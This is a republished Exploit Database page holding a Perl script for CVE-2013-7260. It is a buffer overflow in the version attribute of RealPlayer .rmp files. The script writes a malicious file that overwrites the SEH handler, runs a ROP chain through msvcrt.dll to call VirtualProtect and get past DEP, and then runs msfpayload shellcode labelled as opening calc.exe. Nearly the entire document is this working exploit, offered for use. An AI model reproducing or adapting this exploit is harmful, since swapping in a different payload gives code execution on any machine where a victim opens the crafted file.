RealNetworks RealPlayer 16.0.3.51/16.0.2.32 – ‘.rmp’ Version Attribute Buffer Overflow

• Exploit Database
• 32 阅读

• 作者： Gabor Seljan
  日期： 2013-12-24
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/30468/

• #!/usr/bin/perl
  
  #-----------------------------------------------------------------------------#
  # Exploit Title: RealNetworks RealPlayer Version Attribute Buffer Overflow#
  # Date: Dec 20 2013 #
  # Exploit Author: Gabor Seljan#
  # Vendor Homepage: http://www.real.com#
  # Software Link: http://www.oldapps.com/real.php?old_real_player=12814#
  # Version: 16.0.3.51, 16.0.2.32 #
  # Tested on: Windows XP SP2/SP3 (DEP Bypass)#
  # CVE: CVE-2013-7260#
  #-----------------------------------------------------------------------------#
  
  use strict;
  use warnings;
  
  my $filename = "sploit.rmp";
  
  my $junk1 = "\x41" x 44;# Offset to ROP + Shellcode
  my $junk2 = "\x43" x 1858;# Offset to SEH when opening via click (2540)
  my $junk3 = "\x44" x 11052; # Offset to SEH when opening via menu (13600)
  my $nSEH= "\xeb\x06\x90\x90"; # Overwrite next SEH with JMP (6 bytes)
  my $SEH = pack('V',0x5acceecd); # ADD ESP,428 # RETN 10 [mswmdm.dll]
  my $junk4 = "\x45" x 17000; # Generate exception
  
  my $rop_gadgets= "";
   $rop_gadgets .= pack('V',0x77c1c552);# RETN (ROP NOP) [msvcrt.dll]
   $rop_gadgets .= "\x42" x 16;		# JUNK
   $rop_gadgets .= pack('V',0x77c21d16);# POP EAX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c11120);# &VirtualProtect() [IAT msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c1bb36);# POP EBP # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c20497);# skip 4 bytes [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c2362c);# POP EBX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x0000095c);# 0x0000095C-> EBX
   $rop_gadgets .= pack('V',0x77c4cb29);# POP EDX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x00000040);# 0x00000040-> EDX
   $rop_gadgets .= pack('V',0x77c1f519);# POP ECX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77C5D305);# &Writable location [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c23b47);# POP EDI # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c47a42);# RETN (ROP NOP) [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c2ed13);# POP ESI # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c2aacc);# JMP [EAX] [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c12df9);# PUSHAD # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c35459);# PUSH ESP # RETN [msvcrt.dll]
  
  my $nops = "\x90" x 16;
  
  # msfpayload windows/exec CMD=calc.exe
  my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1".
  "\x33\x83\xea\xfc\x31\x42\x0e\x03\x6d\x90\x4b\x9a\x8d\x44\x02\x65\x6d\x95\x75".
  "\xef\x88\xa4\xa7\x8b\xd9\x95\x77\xdf\x8f\x15\xf3\x8d\x3b\xad\x71\x1a\x4c\x06".
  "\x3f\x7c\x63\x97\xf1\x40\x2f\x5b\x93\x3c\x2d\x88\x73\x7c\xfe\xdd\x72\xb9\xe2".
  "\x2e\x26\x12\x69\x9c\xd7\x17\x2f\x1d\xd9\xf7\x24\x1d\xa1\x72\xfa\xea\x1b\x7c".
  "\x2a\x42\x17\x36\xd2\xe8\x7f\xe7\xe3\x3d\x9c\xdb\xaa\x4a\x57\xaf\x2d\x9b\xa9".
  "\x50\x1c\xe3\x66\x6f\x91\xee\x77\xb7\x15\x11\x02\xc3\x66\xac\x15\x10\x15\x6a".
  "\x93\x85\xbd\xf9\x03\x6e\x3c\x2d\xd5\xe5\x32\x9a\x91\xa2\x56\x1d\x75\xd9\x62".
  "\x96\x78\x0e\xe3\xec\x5e\x8a\xa8\xb7\xff\x8b\x14\x19\xff\xcc\xf0\xc6\xa5\x87".
  "\x12\x12\xdf\xc5\x78\xe5\x6d\x70\xc5\xe5\x6d\x7b\x65\x8e\x5c\xf0\xea\xc9\x60".
  "\xd3\x4f\x25\x2b\x7e\xf9\xae\xf2\xea\xb8\xb2\x04\xc1\xfe\xca\x86\xe0\x7e\x29".
  "\x96\x80\x7b\x75\x10\x78\xf1\xe6\xf5\x7e\xa6\x07\xdc\x1c\x29\x94\xbc\xcc\xcc".
  "\x1c\x26\x11\x7f\x72\x75\x0a\xf5\x98\x79\x2f\xb1\x76\x30\xe0\x3f\x49\x74\x0d".
  "\x93\x42\x0c\xbf\x92\xb8\x4e\xba\x4a\xbe\x99\x71\x09\xf8\x14\xa9\x96\x91\x7e".
  "\x7c\x77\x27\x25\x7b\x38\xd6\x9b\x33\xd5\xb5\x31\xe1\x66\xb7\xb4\x80\xd2\xfd".
  "\x2d\xb6\x24\x43\x67\x90\xb2\xbb\x47\x40\x73\x3c\x3d\x97\x1c\x29\xd0\xf9\x70".
  "\x4b\x78\x35\x9f\x4f\x2c\xb3\x7a\x05\x87\xf6\xd3\xeb\x48\xb0\x89\xf7\xe2\x41".
  "\x1d\x8d\xb9\x15\x04\x2b\xfc\xa8\x3a\xd4\x37\x7d\x19\xf8\x7e\x08\xeb\x21\xe1".
  "\x7b\x71\x75\x05\x3f\xbb\x66\x0c\x93\x3c\x8d\x98\x69\xf9\x7c\x27\x70\x48\x23".
  "\xd4\x84\xf5\xbe\x72\x4e\xa8\x9b\x73\x25\x41\x81\xe0\x04\x40\x78\x79\x43\x37".
  "\x7f\x2c\x96\xb9\xbf\x74\x77\x1d\x0d\x20\xfc\xb4\x91\xa9\xb8\x97\x4b\x18\xe3".
  "\x49\x7d\x76\x3d\x47\xba\xb5\x14\x99\xb1\x24\x83\xe2\x10\xfd\x67\x7a\x4f\x35".
  "\x9f\xb6\xb3\x7d\x75\x32\xe2\x4a\x86\xd5\xb2\xb7\xb0\x77\x11\xe0\x12\xd1\xeb".
  "\x1c\x90\x7f\x42\x7c\x2d\x92\x72\x2f\x7a\x13\xc0\xd6\x76\x15\x99\x70\x14\x8d".
  "\x4e\xbe\x96\xb7\x85\xff\xc1\xe1\x2d\xb0\x71\x1b\xd5\x1d\x02\xe3\x04\x7b\x05".
  "\xb2\x73\x03\xf8\xb4\x7e\x1a\xfd\xb9\x37\x42\x4b\xb3\x39\xf9\x25\xb5\xa8\x3d".
  "\xba\x92\x40\x4a\xb6\x24\x79\x27\x0c\xbb\x88\xfc\x3c\x35\x97\x4f\x9b\x47\x78".
  "\x15\x41\x91\x66\xb1\x74\x0d\xbf\xb8\x90\x28\xd4\x2a\xf5\x3f\x43\x93\x98\x2c".
  "\x1c\xa9\x2f\x48\x9f\x67\x49\x3b\xd6"; 
  
  my $evil = $rop_gadgets.$nops.$shellcode;
  
  my $sploit = $junk1.$evil.$junk2.$nSEH.$SEH.$junk3.$nSEH.$SEH.$junk4;
  
  open(FILE, ">$filename") || die "[-]Error:\n$!\n";
  print FILE "<?xml version=\"$sploit\"?>";
  close(FILE);
  
  print "Exploit file created successfully [$filename]!\n";